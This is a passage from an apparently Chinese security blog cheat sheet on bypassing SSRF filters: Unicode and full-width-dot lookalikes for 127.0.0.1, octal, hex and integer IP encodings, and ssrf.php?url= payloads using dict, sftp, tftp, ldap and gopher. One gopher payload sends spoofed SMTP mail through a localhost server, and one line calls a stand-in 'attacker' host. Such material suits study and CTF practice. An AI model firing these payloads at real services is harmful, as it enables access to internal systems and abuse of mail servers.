⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ 
⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿</code></pre>
<h3 id="利用句号"><a class="markdownIt-Anchor" href="#利用句号"></a> 利用句号</h3>
<pre><code class="highlight plaintext">127。0。0。1  &gt;&gt;&gt;  127.0.0.1</code></pre>
<h3 id="利用进制转换"><a class="markdownIt-Anchor" href="#利用进制转换"></a> 利用进制转换</h3>
<pre><code class="highlight plaintext">例如192.168.0.1
C0 A8 00 01
8 进制格式：0300.0250.0.1
16 进制格式：0xC0.0xA8.0.1
10 进制整数格式：3232235521
16 进制整数格式：0xC0A80001
还有一种特殊的省略模式，例如10.0.0.1这个 IP 可以写成10.1

127.0.0.1=&gt;7F 00 00 01
可以是十六进制，八进制等。
115.239.210.26  &gt;&gt;&gt;  16373751032
首先把这四段数字给分别转成16进制，结果：73 ef d2 1a
然后把 73efd21a 这十六进制一起转换成8进制
记得访问的时候加0表示使用八进制(可以是一个0也可以是多个0 跟XSS中多加几个0来绕过过滤一样)，十六进制加0x</code></pre>
<h3 id="利用协议"><a class="markdownIt-Anchor" href="#利用协议"></a> 利用协议</h3>
<pre><code class="highlight plaintext">Dict://
dict://&lt;user-auth&gt;@&lt;host&gt;:&lt;port&gt;/d:&lt;word&gt;
ssrf.php?url=dict://attacker:11111/
SFTP://
ssrf.php?url=sftp://example.com:11111/
TFTP://
ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET
LDAP://
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
Gopher://
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a</code></pre>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>请我一杯咖啡吧！</div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.jpg" alt="AyaN0 微信">
        <span>微信</span>
      </div>

  </div>
</div>

          <div class="post-tags">
              <a href="/tags/Web/" rel="tag"># -Web</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/07/01/%E7%A3%A8%E5%A5%BD%E7%9A%84%E5%88%A9%E5%89%91-PHP%E5%8E%9F%E7%94%9F%E7%B1%BB/" rel="prev" title="磨好的利剑:PHP原生类">
                  <i class="fa fa-angle-left"></i> 磨好的利剑:PHP原生类
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/07/07/%E5%88%B7%E9%A2%98%E8%9B%86%E6%9D%A5%E5%92%AF-CTFshow/" rel="next" title="刷题蛆来咯-CTFshow">
                  刷题蛆来咯-CTFshow <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">AyaN0</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">314k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">9:31</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
